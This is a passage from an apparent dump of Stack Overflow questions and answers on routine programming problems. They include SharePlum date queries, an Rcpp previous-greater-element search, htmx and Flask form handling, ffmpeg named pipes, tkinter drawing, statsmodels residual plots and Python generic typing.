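As a sketch of the "filter that checks the condition from both sides" alternative mentioned at the end of the answer, reusing the asker's isPred/isAfter helpers exactly as defined in the question (this keeps unique pairs but tests the violation in both directions, since a unique pair only ever yields one of (A, B) / (B, A)):

def precondition_conflict(constraint_factory: ConstraintFactory) -> Constraint:
    # Respect order constraints, checking both orientations of each unique pair
    return (
        constraint_factory.for_each_unique_pair(Operation)
        .filter(lambda op1, op2: (op1.isPred(op2) and op1.isAfter(op2))
                              or (op2.isPred(op1) and op2.isAfter(op1)))
        .penalize(HardSoftScore.ONE_HARD)
        .as_constraint("Order conflict")
    )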
79,572,510 | 2025-4-14 | https://stackoverflow.com/questions/79572510/shareplum-queries-do-not-support-datetime-variables | Shareplum is unable to retrieve entries from a Sharepoint list using DateTime variables (for example, to find entries that were modified after a certain date). Code: from requests_negotiate_sspi import HttpNegotiateAuth from shareplum import Site import datetime site = Site("sharepoint.com", version=Version.v2016, auth=HttpNegotiateAuth()) date = datetime.datetime(2025, 4, 8, 0, 0, 0) query = {'Where' : [('Gt', 'Modified', date)]} sp_list = site.List('Sharepoint List') data = sp_list.GetListItems('All Items', query=query) If a datetime object is provided, the following error occurs: TypeError : Argument must be bytes or unicode, got 'datetime' If a string/integer is provided, the following error occurs instead: Failed to download list items Shareplum HTTP Post Failed : 500 Server Error As mentioned in these issues: https://github.com/jasonrollins/shareplum/issues/156 https://github.com/jasonrollins/shareplum/issues/186 | You can manually craft the CAML query XML, rather than using SharePlum’s dictionary-style shorthand. Here’s how to do it: from requests_negotiate_sspi import HttpNegotiateAuth from shareplum import Site from shareplum import Office365 from shareplum.site import Version import datetime # SharePoint credentials site_url = "https://yourcompany.sharepoint.com/sites/yoursite" list_name = "Your List Name" auth = HttpNegotiateAuth() site = Site(site_url, auth=auth, version=Version.v2016) sp_list = site.List(list_name) # Construct CAML query dt = datetime.datetime(2025, 4, 8, 0, 0, 0) date_string = dt.strftime('%Y-%m-%dT%H:%M:%SZ') # Format must be UTC ISO8601 caml_query = f""" <View> <Query> <Where> <Gt> <FieldRef Name='Modified' /> <Value Type='DateTime'>{date_string}</Value> </Gt> </Where> </Query> </View> """ # Retrieve items items = sp_list.GetListItems(view_name=None, query=caml_query) print(items) | 1 | 1 |
79,571,959 | 2025-4-13 | https://stackoverflow.com/questions/79571959/efficient-rolling-non-equi-joins | Looking for the current most efficient approach in either R, python or c++ (with Rcpp). Taking an example with financial data, df time bid ask time_msc flags wdayLab wday rowid <POSc> <num> <num> <POSc> <int> <ord> <num> <int> 1: 2025-01-02 04:00:00 21036.48 21043.08 2025-01-02 04:00:00.888 134 Thu 5 1 2: 2025-01-02 04:00:00 21037.54 21043.27 2025-01-02 04:00:00.888 134 Thu 5 2 3: 2025-01-02 04:00:00 21036.52 21042.55 2025-01-02 04:00:00.888 134 Thu 5 3 4: 2025-01-02 04:00:00 21036.82 21041.75 2025-01-02 04:00:00.888 134 Thu 5 4 5: 2025-01-02 04:00:00 21036.79 21040.78 2025-01-02 04:00:00.891 134 Thu 5 5 6: 2025-01-02 04:00:00 21035.86 21039.95 2025-01-02 04:00:00.891 134 Thu 5 6 7: 2025-01-02 04:00:00 21036.05 21038.76 2025-01-02 04:00:00.891 134 Thu 5 7 8: 2025-01-02 04:00:00 21034.74 21038.33 2025-01-02 04:00:00.891 134 Thu 5 8 9: 2025-01-02 04:00:00 21034.72 21039.35 2025-01-02 04:00:00.892 134 Thu 5 9 10: 2025-01-02 04:00:00 21034.99 21038.08 2025-01-02 04:00:00.892 134 Thu 5 10 I want, for each rowid, the most recent rowid in the past where the ask was higher. My real data has 29,871,567 rows (can share if needed). The solution doesn't need to be a join as long as the last higher rowid is retrieved. R data.table I usually solve this using R's data.table joins: library(data.table) setDTthreads(detectCores() - 2) # no effect df_joined <- df[,.(rowid, ask, time_msc)][,rowid_prevHi:=rowid][,ask_prevHi := ask][ df, on = .(rowid < rowid, ask >= ask), mult = "last", # Take the closest (most recent) match # by = .EACHI, # Do it row-by-row nomatch = NA, # Allow NA if no such row exists #.(i.rowid, last_higher_row = x.rowid, last_higher = x.time, lastHigh = x.ask) ][, difference_from_previous_higher := ask_prevHi - ask] This works on smaller datasets because both multiple inequalities and the rolling condition mult = "last" are supported. However, it is single-threaded and my rig doesn't manage the full dataset. Expected result is below, and I expect the difference_from_previous_higher to be always positive and the rowid_prevHi always smaller than rowid. 
rowid ask time_msc rowid_prevHi ask_prevHi time bid i.time_msc flags <int> <num> <POSc> <int> <num> <POSc> <num> <POSc> <int> 1: 1 21043.08 <NA> NA NA 2025-01-02 04:00:00 21036.48 2025-01-02 04:00:00.888 134 2: 2 21043.27 <NA> NA NA 2025-01-02 04:00:00 21037.54 2025-01-02 04:00:00.888 134 3: 3 21042.55 2025-01-02 04:00:00.888 2 21043.27 2025-01-02 04:00:00 21036.52 2025-01-02 04:00:00.888 134 4: 4 21041.75 2025-01-02 04:00:00.888 3 21042.55 2025-01-02 04:00:00 21036.82 2025-01-02 04:00:00.888 134 5: 5 21040.78 2025-01-02 04:00:00.888 4 21041.75 2025-01-02 04:00:00 21036.79 2025-01-02 04:00:00.891 134 6: 6 21039.95 2025-01-02 04:00:00.891 5 21040.78 2025-01-02 04:00:00 21035.86 2025-01-02 04:00:00.891 134 7: 7 21038.76 2025-01-02 04:00:00.891 6 21039.95 2025-01-02 04:00:00 21036.05 2025-01-02 04:00:00.891 134 8: 8 21038.33 2025-01-02 04:00:00.891 7 21038.76 2025-01-02 04:00:00 21034.74 2025-01-02 04:00:00.891 134 9: 9 21039.35 2025-01-02 04:00:00.891 6 21039.95 2025-01-02 04:00:00 21034.72 2025-01-02 04:00:00.892 134 10: 10 21038.08 2025-01-02 04:00:00.892 9 21039.35 2025-01-02 04:00:00 21034.99 2025-01-02 04:00:00.892 134 wdayLab wday difference_from_previous_higher <ord> <num> <num> 1: Thu 5 NA 2: Thu 5 NA 3: Thu 5 0.72 4: Thu 5 0.80 5: Thu 5 0.97 6: Thu 5 0.83 7: Thu 5 1.19 8: Thu 5 0.43 9: Thu 5 0.60 10: Thu 5 1.27 polars I've tried a polars implementation in python, but although join_asof is multiprocessed, fast and supports the backwards strategy it doesn't support specifying other inequalities while joining, only filtering after the join which is not useful. joined = df.join_asof( df.select(['rowid', 'time_msc', 'ask']).with_columns([ pl.col('time_msc').alias('time_prevhi') ]), on="time_msc", strategy="backward", suffix="_prevhi", allow_exact_matches=False ).with_columns([ (pl.col('rowid')-pl.col('rowid_prevhi')).alias('ticksdiff_prevhi'), (pl.col('ask')-pl.col('ask_prevhi')).alias('askdiff_prevhi'), ]) I'm not even sure how the matches are chosen, but of course ask is not always smaller than ask_prevHi since I couldn't mention it. shape: (10, 13) ┌─────┬─────┬─────┬───────┬────────┬──────┬───────┬────────┬───────┬───────┬───────┬───────┬───────┐ │ bid ┆ ask ┆ tim ┆ flags ┆ wdayLa ┆ wday ┆ rowid ┆ time ┆ rowid ┆ ask_p ┆ time_ ┆ ticks ┆ askdi │ │ --- ┆ --- ┆ e_m ┆ --- ┆ b ┆ --- ┆ --- ┆ --- ┆ _prev ┆ revhi ┆ prevh ┆ diff_ ┆ ff_pr │ │ f64 ┆ f64 ┆ sc ┆ i64 ┆ --- ┆ i64 ┆ i64 ┆ dateti ┆ hi ┆ --- ┆ i ┆ prevh ┆ evhi │ │ ┆ ┆ --- ┆ ┆ str ┆ ┆ ┆ me[μs] ┆ --- ┆ f64 ┆ --- ┆ i ┆ --- │ │ ┆ ┆ dat ┆ ┆ ┆ ┆ ┆ ┆ i64 ┆ ┆ datet ┆ --- ┆ f64 │ │ ┆ ┆ eti ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ime[m ┆ i64 ┆ │ │ ┆ ┆ me[ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ s] ┆ ┆ │ │ ┆ ┆ ms] ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ ╞═════╪═════╪═════╪═══════╪════════╪══════╪═══════╪════════╪═══════╪═══════╪═══════╪═══════╪═══════╡ │ 210 ┆ 210 ┆ 202 ┆ 134 ┆ Thu ┆ 5 ┆ 1 ┆ 2025-0 ┆ null ┆ null ┆ null ┆ null ┆ null │ │ 36. ┆ 43. ┆ 5-0 ┆ ┆ ┆ ┆ ┆ 1-02 ┆ ┆ ┆ ┆ ┆ │ │ 48 ┆ 08 ┆ 1-0 ┆ ┆ ┆ ┆ ┆ 00:00: ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 2 ┆ ┆ ┆ ┆ ┆ 00 ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 00: ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 00: ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 00. ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 888 ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ 210 ┆ 210 ┆ 202 ┆ 134 ┆ Thu ┆ 5 ┆ 2 ┆ 2025-0 ┆ 1 ┆ 21043 ┆ 2025- ┆ 1 ┆ 0.19 │ │ 37. ┆ 43. ┆ 5-0 ┆ ┆ ┆ ┆ ┆ 1-02 ┆ ┆ .08 ┆ 01-02 ┆ ┆ │ │ 54 ┆ 27 ┆ 1-0 ┆ ┆ ┆ ┆ ┆ 00:00: ┆ ┆ ┆ 00:00 ┆ ┆ │ │ ┆ ┆ 2 ┆ ┆ ┆ ┆ ┆ 00 ┆ ┆ ┆ :00.8 ┆ ┆ │ │ ┆ ┆ 00: ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ 88 ┆ ┆ │ │ ┆ ┆ 00: ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 00. 
┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 889 ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ 210 ┆ 210 ┆ 202 ┆ 134 ┆ Thu ┆ 5 ┆ 3 ┆ 2025-0 ┆ 1 ┆ 21043 ┆ 2025- ┆ 2 ┆ -0.53 │ │ 36. ┆ 42. ┆ 5-0 ┆ ┆ ┆ ┆ ┆ 1-02 ┆ ┆ .08 ┆ 01-02 ┆ ┆ │ │ 52 ┆ 55 ┆ 1-0 ┆ ┆ ┆ ┆ ┆ 00:00: ┆ ┆ ┆ 00:00 ┆ ┆ │ │ ┆ ┆ 2 ┆ ┆ ┆ ┆ ┆ 00 ┆ ┆ ┆ :00.8 ┆ ┆ │ │ ┆ ┆ 00: ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ 88 ┆ ┆ │ I've also tried Polar's join_where which supports inequalities, but not a "nearest" constraint or strategy, and therefore explodes the number of lines quadratically, consuming all compute resources without a result. jw = df.join_where( df.select(['rowid', 'time_msc', 'ask']), pl.col("rowid") > pl.col("rowid_prevhi"), pl.col("ask") > pl.col("ask_prevhi"), suffix="_prevhi",) My next approach might be to loop over each row using an Rcpp function executed in parallel from R, which retrieves the rowid of the last previous higher ask. Or perhaps frollapply from data.table would do the trick? Suggestions most welcome. | Here is a RCCP stack-based approach of the Previous Greater Element problem with O(n) time complexity. It is also described here or here. IDK how fast you want this to be, maybe Java is faster. You could also use OpenMP parallel processing for the for-loop. For 1 million rows it runs with a median of 19.1ms Code d <- data.frame( rowid = 1:10e5, ask = sample(1:10e5) ) library(Rcpp) cppFunction(' List pge(NumericVector rowid, NumericVector ask) { int n = rowid.size(); NumericVector prevHigherRowid(n, NA_REAL); NumericVector prevHigherAsk(n, NA_REAL); NumericVector diff(n, NA_REAL); std::vector<int> stack; stack.reserve(n); for(int i = 0; i < n; i++) { double currentAsk = ask[i]; while(!stack.empty() && currentAsk >= ask[stack.back()]) { stack.pop_back(); } if(!stack.empty()) { prevHigherRowid[i] = rowid[stack.back()]; prevHigherAsk[i] = ask[stack.back()]; diff[i] = prevHigherAsk[i] - currentAsk; } stack.push_back(i); } return List::create( Named("rowid_prevHi") = prevHigherRowid, Named("ask_prevHi") = prevHigherAsk, Named("difference_from_previous_higher") = diff ); } ') pge_r <- function(d){ res<- pge(d$rowid, d$ask) d$rowid_prevHi <- res$rowid_prevHi d$ask_prevHi <- res$ask_prevHi d$difference_from_previous_higher <- res$difference_from_previous_higher d } bench::mark(pge_r(d)) | 1 | 4 |
79,572,062 | 2025-4-13 | https://stackoverflow.com/questions/79572062/django-duplication-of-html-on-page-load | I am using DJANGO to create a website, with minimal add ins. At this time, I have a page that duplicates itself on select change. Trying to change its' behavior only makes it worse, like if I change the swap to outer, then it duplicates outside of the element rather than in it. The environment: Windows 11 Pro x64 Visual Studio Code x64 python 3.12.3 Packages Versions ------------------------ --------- asgiref 3.8.1 certifi 2025.1.31 charset-normalizer 3.4.1 Django 5.2 django-htmx 1.23.0 django-multiselectfield 0.1.13 django-phonenumber-field 8.1.0 idna 3.10 phonenumberslite 9.0.3 pip 24.0 pyasn1 0.6.1 pyasn1_modules 0.4.2 python-ldap 3.4.4 The base html: {% load django_htmx %} <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="keywords" content="HTML, CSS, Python, JINJA"/> <meta name="viewport" content="width=device-width, initial-scale=1" /> {% htmx_script %} </head> <bod hx-headers='{"x-csrftoken": "{{ csrf_token }}"}'> <div id="navbar"> <nav class="navbar navbar-expand-lg navbar-dark bg-dark"> <span ><h1>{% block page_title %}base_title{% endblock page_title %}</h1></span> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbar"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbar" > <div class="navbar-nav" style="margin-left: auto; margin-right: 0;"> <a class="nav-item nav-link" id="logout" href="/mytickets"> My Tickets </a> <a class="nav-item nav-link" id="logout" href="/createticket"> Create Ticket </a> <a class="nav-item nav-link" id="logout" href="/companytickets"> Company Tickets </a> <a class="nav-item nav-link" id="logout" href="/companyalerts"> Company Alerts </a> <a class="nav-item nav-link" id="logout" href="/logout"> Logout </a> <a class="nav-item nav-link" id="logout" href="/profile"> <svg xmlns="../static/css/person.svg" width="16" height="16" fill="black" class="bi bi-person" viewBox="0 0 16 16"> <path d="M8 8a3 3 0 1 0 0-6 3 3 0 0 0 0 6m2-3a2 2 0 1 1-4 0 2 2 0 0 1 4 0m4 8c0 1-1 1-1 1H3s-1 0-1-1 1-4 6-4 6 3 6 4m-1-.004c-.001-.246-.154-.986-.832-1.664C11.516 10.68 10.289 10 8 10s-3.516.68-4.168 1.332c-.678.678-.83 1.418-.832 1.664z"/> </svg> </a> </div> </div> </nav> </div> {% block select %} base_select {% endblock select%} {% block content %} base_content {% endblock content %} </body> </html> The template for: {% extends 'website/base.html' %} {% block page_title %} Create Tickets {% endblock %} {% block select %} <select hx-post="/createticket/" hx-swap="innerHTML" hx-trigger="change" hx-target="#form-content" selected="other" name="select_ticket_type" id="select_ticket_type"> <option value="new_user">New Employee</option> <option value="new_asset">New Asset</option> <option value="new_app">New Application</option> <option value="other">Other</option> </select> {% endblock select %} {% block content %} <form name="form-content" id="form-content" method="post"> {% csrf_token %} {{ form }} <button type="submit" name="Create Ticket">Create Ticket</button> </form> {% endblock content %} The view.py: def create_ticket(response): form_selection = response.POST.get('select_ticket_type') print(response) if response.method == "POST": match form_selection: case "new_user": print("new user") new_user = CreeateUser(response.POST) if new_user.is_valid(): # Process form A data response.session['display_form'] = response.POST.get('select_ticket_type') return 
redirect('createticket') case "new_app": print("new app") new_app = CreateApplication(response.POST) if new_app.is_valid(): # Process form B data response.session['display_form'] = response.POST.get('select_ticket_type') return redirect('my_view') case "new_asset": print("new asset") new_asset = CreateAsset() if new_asset.is_valid(): # Process form B data response.session['display_form'] = response.POST.get('select_ticket_type') return redirect('my_view') case _: print("other") form = CreateOther(response.POST) display_form = response.session.get('display_form', response.POST.get('select_ticket_type')) print(f"display for is {display_form}") match display_form: case "new_user": print("Form is for user") form = CreeateUser() case "new_app": print("form is for app") form = CreateApplication() case "new_asset": print("form for new asset") form = CreateAsset() case _: form = CreateOther() context = {'form': form} return render(response, 'website/createticket.html', context) I have tried to make it as simple as possible for now to reduce conflicts and narrow down what is going on. hx-swap"outer/innter/beforebegin/afterbeing/..." do not help. I wrote out the AJAX for this and it does the same thing. const select_ticket_type = document.getElementById('select_ticket_type'); select_ticket_type.addEventListener('change', function() { const selectedValue = this.value; fetch('/createticket/', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'X-CSRFToken': '{{ csrf_token }}', }, body: 'select_ticket_type=' + selectedValue, }) .then(response => response.text()) .then(data => { document.getElementById('form-content').innerHTML = data; }); }); | The issue is that on select you're replacing the <form name="form-content" id="form-content" method="post"> with your entire page. What you actually want to do is replace the contents of the form with the contents of the newly generated form, and ignore the remainder of the page. Htmx has an attribute to achieve this, hx-select. Docs here. To use it, add hx-select="#form-content" to your select tag: <select hx-post="/createticket/" hx-swap="innerHTML" hx-trigger="change" hx-target="#form-content" hx-select="#form-content" selected="other" name="select_ticket_type" id="select_ticket_type" > | 2 | 0 |
79,571,645 | 2025-4-13 | https://stackoverflow.com/questions/79571645/form-causes-an-unsupported-media-format-error | I'm working on a todo app for a class project and the /add_todo route returns a 415 error code whenever I try to add a todo. @app.route("/add-todo", methods=["GET", "POST"]) def add_todo(): title = request.get_json().get("title") db.session.add(Todo(title=title)) db.session.commit() return '', 204 <form action="/add-todo" method="post" hx-boost="true"> <input type="text" id="todo_bar"> <button id="submit">Add</button> </form> I've tried everything from changing what the route returns to adding the methods array when declaring the route, yet nothing seems to make a difference. | The data you're sending is form-encoded (by the browser). You can retrieve it by using form instead of get_json: @app.route("/add-todo", methods=["POST"]) def add_todo(): title = request.form.get("title") # Here ---------^ db.session.add(Todo(title=title)) db.session.commit() return '', 204 | 2 | 3 |
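One extra detail worth noting for the accepted answer to work end to end: the question's input element has no name attribute, and browsers only include named fields in submitted form data, so the input needs name="title" for request.form.get("title") to find the value. A hedged sanity check with Flask's test client (assuming the app, db and Todo objects from the question):

# hypothetical quick check: posting form-encoded data with a "title" field
with app.test_client() as client:
    resp = client.post("/add-todo", data={"title": "buy milk"})
    assert resp.status_code == 204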
79,571,144 | 2025-4-13 | https://stackoverflow.com/questions/79571144/passing-two-named-pipes-as-input-to-ffmpeg-using-python | I have two AV streams, one video and one audio, and I'm trying to pipe both as inputs to ffmpeg os.mkfifo(VIDEO_PIPE_NAME) os.mkfifo(AUDIO_PIPE_NAME) ffmpeg_process = subprocess.Popen([ "ffmpeg", "-i", VIDEO_PIPE_NAME, "-i", AUDIO_PIPE_NAME, "-listen", "1", "-c:v", "copy", "-c:a", "copy", "-f", "mp4", "-movflags", "frag_keyframe+empty_moov", "http://0.0.0.0:8081"], stdin=subprocess.PIPE) pipe_video = open(VIDEO_PIPE_NAME,'wb') pipe_audio = open(AUDIO_PIPE_NAME,'wb') #Code stuck here The code gets stuck on the pipe_audio = open(AUDIO_PIPE_NAME,'wb') line; I'm guessing it happens because ffmpeg only reads the first/video input and ignores the second/audio input, so the pipe is not being read. If I use only pipe_video and remove the -i AUDIO_PIPE_NAME flag from ffmpeg, everything works fine, but I only get the video without the audio. | I can confirm chrslg's comment under the OP. Placing each pipe's open() call in its own write thread should resolve your issue. I'm close to releasing a new version of ffmpegio that introduces this exact feature, and it works well. | 2 | 1 |
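A minimal sketch of the "one writer thread per pipe" idea from the answer; video_chunks and audio_chunks are placeholders for the OP's actual video and audio byte streams:

import threading

def feed(pipe_name, chunks):
    # open() on a FIFO blocks until ffmpeg opens it for reading, so giving each
    # FIFO its own writer thread avoids the deadlock described in the question
    with open(pipe_name, "wb") as pipe:
        for chunk in chunks:
            pipe.write(chunk)

video_thread = threading.Thread(target=feed, args=(VIDEO_PIPE_NAME, video_chunks))
audio_thread = threading.Thread(target=feed, args=(AUDIO_PIPE_NAME, audio_chunks))
video_thread.start()
audio_thread.start()
video_thread.join()
audio_thread.join()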
79,571,506 | 2025-4-13 | https://stackoverflow.com/questions/79571506/tkinter-canvas-rectangle-appears-with-incorrect-size-depending-on-row-column-h | I am writing a Python tkinter rectangle function: def Rectangle(row,col,color="#FFFFFF",outline="gray"): """ Fills a block with a color. Args: row - The row col - The column *color - The rectangle color *outline - The color of the outline """ global blockwidth, blockheight, canvas x, y, i = blockCoords(row,col) canvas.create_rectangle(x//2,y//2,x*2,y*2,fill=color,outline=outline) This function should make a rectangle at those (row, col) coordinates exactly one block (rectangle in the drawn grid, explained later) big. def blockCoords(row, col): """ Gets the row and col value of a digit. Args: rows - The block's row cols - The block's col Returns: The x and y coordinates and it's respective index """ global blockwidth, blockheight, canwidth, canheight row -= 1 col -= 1 x = col * blockwidth + blockwidth // 2 y = row * blockheight + blockheight // 2 i = row+col return x, y, i Then the rectangle function is called in the main function: blockwidth = 20 blockheight = 40 win = tk.Tk() states = [] win.title("Terminos App") with open("set.json","r") as f: settings = json.load(f) # create a canvas canwidth = 1200 canheight = 800 canvas = tk.Canvas(win,width=canwidth,height=canheight,bg="#232627") canvas.pack(fill=tk.BOTH,expand=tk.YES) def main(): """ The main function that handles the window Args: event - A detected keypress """ global win, canvas, canwidth, canheight, blockwidth, blockheight cols = canwidth//blockwidth rows = canheight//blockheight for row in range(canwidth): for col in range(canheight): states.append("") x1 = col * blockwidth y1 = row * blockheight x2 = x1 + blockwidth y2 = y1 + blockheight canvas.create_rectangle(x1, y1, x2, y2, outline="gray") # Used for debugging purposes Rectangle(10,15) The code should create the rectangle I explained, but it creates one with a different size depending on the row and col coordinates. What is the problem and what is the solution? Thanks! | You're currently treating the center point (x, y) as if it were the top-left and bottom-right corners. Instead of x//2 and x*2, calculate the corners based on width and height like this: canvas.create_rectangle(x - blockwidth // 2, y - blockheight // 2, x + blockwidth // 2, y + blockheight // 2, fill=color, outline=outline) That way, the rectangle will be exactly blockwidth × blockheight in size, centred at the calculated coordinates. | 2 | 2 |
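Folded back into the asker's Rectangle function, the corrected call would look roughly like this (blockCoords, canvas, blockwidth and blockheight as defined in the question):

def Rectangle(row, col, color="#FFFFFF", outline="gray"):
    """Fill the grid block at (row, col) with a color."""
    x, y, i = blockCoords(row, col)  # (x, y) is the centre of the block
    canvas.create_rectangle(
        x - blockwidth // 2, y - blockheight // 2,  # top-left corner
        x + blockwidth // 2, y + blockheight // 2,  # bottom-right corner
        fill=color, outline=outline,
    )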
79,569,505 | 2025-4-11 | https://stackoverflow.com/questions/79569505/load-deepseek-v3-model-from-local-repo | I want to run the DeepSeek-V3 model inference using the Hugging-Face Transformer library (>= v4.51.0). I read that you can do the following to do that (download the model and run it) from transformers import pipeline messages = [ {"role": "user", "content": "Who are you?"}, ] pipe = pipeline("text-generation", model="deepseek-ai/DeepSeek-R1", trust_remote_code=True) pipe(messages) My issue is that I already downloaded the DeepSeek-V3 hugging-face repository separately, and I just want to tell the Transformer where it is on my local machine, so that it can run the inference. The model repository is thus not (or not necessarily) in the Hugging-Face cache directory (it can be anywhere on the local machine). When loading the model, I want to provide the path which specifically points to the model's repository on the local machine. How can I achieve that? | Since you said you downloaded the model already from Huggingface, I assume you downloaded all of the related Huggingface files including the JSON files in the repo that describe the model for loading. In this case, the pipeline function can easily take a filesystem path in the model parameter instead of a model name. For example, if you downloaded the files to the folder /my-models/deepseek-r1, you just need to load it this way pipe = pipeline("text-generation", model="/my-models/deepseek-r1", trust_remote_code=True) The pipeline function will try to load from the filesystem, and if not found, it will try to look for a model with that name on the Hub. | 2 | 2 |
79,571,067 | 2025-4-13 | https://stackoverflow.com/questions/79571067/residual-analysis-for-simple-linear-regression-model | I'm trying to conduct the residual analysis for simple linear regression. I need to prove that the residuals follow an approximate Normal Distribution. The csv file I'm using has values for Percentage of marks in Grade 10 and the Salary the student makes. Once I run the below code, my plot looks like this: The plot in the book looks like this: I was expecting my plot to show up like the book as the data is the same. I have double-checked to make sure I'm not missing any data etc. I have split the data set into training and test as per the book as well. Data is as follows: Percentage Salary 62 270000 76.33 200000 72 240000 60 250000 61 180000 55 300000 70 260000 68 235000 82.8 425000 59 240000 58 250000 60 180000 66 428000 83 450000 68 300000 37.33 240000 79 252000 68.4 280000 70 231000 59 224000 63 120000 50 260000 69 300000 52 120000 49 120000 64.6 250000 50 180000 74 218000 58 360000 67 150000 75 250000 60 200000 55 300000 78 330000 50.08 265000 56 340000 68 177600 52 236000 54 265000 52 200000 76 393000 64.8 360000 74.4 300000 74.5 250000 73.5 360000 57.58 180000 68 180000 69 270000 66 240000 60.8 300000 The code is below: # Importing all required libraries for building the regression model import pandas as pd import numpy as np import statsmodels.api as sm from sklearn.model_selection import train_test_split import matplotlib.pyplot as plt # Load the dataset into dataframe mba_salary_df = pd.read_csv( 'MBA Salary.csv' ) # Add constant term of 1 to the dataset X = sm.add_constant( mba_salary_df[‘Percentage in Grade 10’] ) Y = mba_salary_df['Salary'] # Split dataset into train and test set into 80:20 respectively train_X, test_X, train_y, test_y = train_test_split( X, Y, train_size = 0.8,random_state = 100 ) # Fit the regression model mba_salary_lm = sm.OLS( train_y, train_X ).fit() mba_salary_resid = mba_salary_lm.resid probplot = sm.ProbPlot(mba_salary_resid) plt.figure( figsize = (8, 6) ) probplot.ppplot(line='45') plt.title("Normal P-P Plot of Regression Standardized Residuals") plt.show() | So, if I understand correctly, you are trying to get the residual part of a linear regression (so the error) on your training dataset, and check if the distribution of that residual part follows a normal law. But ppplot or qqplot need to know which law you want to compare your dataset against. As you probably understand, what it does is, for each sample data s, plot a point whose x coordinate is the theoretical CDF of a distribution, and y coordinate is the experimental CDF (so which proportion of s in your dataset are lower that this s). If you don't specify a distribution function, then, a centered and reduced normal law (μ=0, σ=1) is used by default. But your residual data have a scale way bigger than a standard deviation of 1. So, in practice, all your residuals are very very negative, or very very positive (from a standpoint of a N(0,1) law). I mean by that that either s is so negative than ℙ(X<s) is practically 0, or s is so positive that ℙ(X<s) is practically 1. (for X~N(0,1) that happens for any s lower than -3, or greater than +3, roughly. As you know ℙ(X<2.58)=99%... And 2.58 or 3 is very small compared to your values). So, in short, you need to say against which law you want to test your residual. If you don't, the default is a N(0,1) law that is obviously not similar at all to the distribution of your residuals (in other words: it works! 
and the pp-plot being bad indicates exactly what it is supposed to indicate: that, no, your residual does not follow a N(0,1) law at all). If you have no idea of that law (well, you already said you wanted to test against a normal law), maybe you want to fit one. Either by centering/reducing your data beforehand (so that they are indeed supposed to follow approximately a N(0,1)). Or by computing the mean and stdev of your residual data and passing them as the loc and scale arguments to ProbPlot. Or by creating a normal law yourself (sta.norm(mean, stdev)) and passing that law to ProbPlot. Or, even simpler, by asking ProbPlot to fit the parameters for you (in which case, it fits a normal law. You can't choose another kind of distribution, like a Weibull or Cauchy or...; but I understand you don't want to anyway). So, long story short, if I understand correctly what you want to do, probplot = sm.ProbPlot(mba_salary_resid, fit=True) is probably what you want | 5 | 3 |
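A minimal sketch tying the suggestions above together (it reuses `mba_salary_resid` from the question; the manual standardization shown in the comment is an equivalent alternative to `fit=True`):

```python
import statsmodels.api as sm
import matplotlib.pyplot as plt

# Let ProbPlot estimate the normal law's loc/scale from the residuals themselves
probplot = sm.ProbPlot(mba_salary_resid, fit=True)

# Equivalent idea, done by hand:
# standardized = (mba_salary_resid - mba_salary_resid.mean()) / mba_salary_resid.std()
# probplot = sm.ProbPlot(standardized)

probplot.ppplot(line='45')
plt.title("Normal P-P Plot of Regression Standardized Residuals")
plt.show()
```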
79,571,051 | 2025-4-12 | https://stackoverflow.com/questions/79571051/how-can-i-type-a-method-that-accepts-any-subclass-of-a-base-class | I'm having some trouble typing subclasses of a base class. I have a base class called Table, which defines shared behavior for all table subclasses. Then, I have a Database class that manages collections of these tables. The code below works fine at runtime. However, when I try to type the methods in the Database class using Table as the type annotation, I run into issues when passing a subclass (e.g., Ducks). The types break, and MyPy complains. I think I need to use a bounded generic or a protocol, but I couldn't figure out how to make it work properly. Here’s the relevant code: #!/usr/bin/env python3 from collections.abc import Callable, Iterable, Mapping, Sequence from dataclasses import dataclass from typing import Any, Self, TypeVar # _Table = TypeVar("_Table", bound="Table") <- Tried this but did not work @dataclass class Table: @classmethod def get_name(cls) -> str: return cls.__name__.lower() @dataclass class Database: records: Mapping[str, Sequence[Table]] def filter( self, table: type[Table], _filter: Callable[[Table], bool] ) -> Iterable[Table]: yield from (i for i in self.records[table.get_name()] if _filter(i)) # USING cast(T) here kind of works but i think is kind a cheat. @dataclass class Ducks(Table): name: str age: int if __name__ == "__main__": records = { "ducks": [ Ducks(name="Patinhas", age=104), Ducks(name="Donald", age=30), Ducks(name="Huguinho", age=12), Ducks(name="Zezinho", age=12), Ducks(name="Luizinho", age=12), ] } db = Database(records) f: Callable[[Ducks], bool] = lambda t: t.age < 100 # <- BONUS QUESTION: is there a way to not use this long typing lambda and just use the untyped notation ? print(*db.filter(Ducks, _filter=f), sep="\n") # <- PROBLEM HERE $ python3 ex.py Ducks(name='Donald', age=30) Ducks(name='Huguinho', age=12) Ducks(name='Zezinho', age=12) Ducks(name='Luizinho', age=12) Mypy lint: ex.py 46 37 error arg-type Argument "_filter" to "filter" of "Database" has incompatible type "Callable[[Ducks], bool]"; expected "Callable[[Table], bool]" (lsp)) This makes sense because Callable[[Table], bool] doesn't guarantee compatibility with Ducks, even though it's a subclass. I want the method to work with any subclass of Table and have the type checker understand that. I need a way to tell the type checker that the Database functions should work with any subclass of Table, and that specific operations may require a more specific type. | As stated in the existing answer by @user2357112, you can't make this fully type safe: mapping from a name (string) to some sequence of instances can't be encoded in python's static type system, you can't map a name to a type. However, your filter method is probably the best possible approach. You didn't try to throw in more stringly-typed 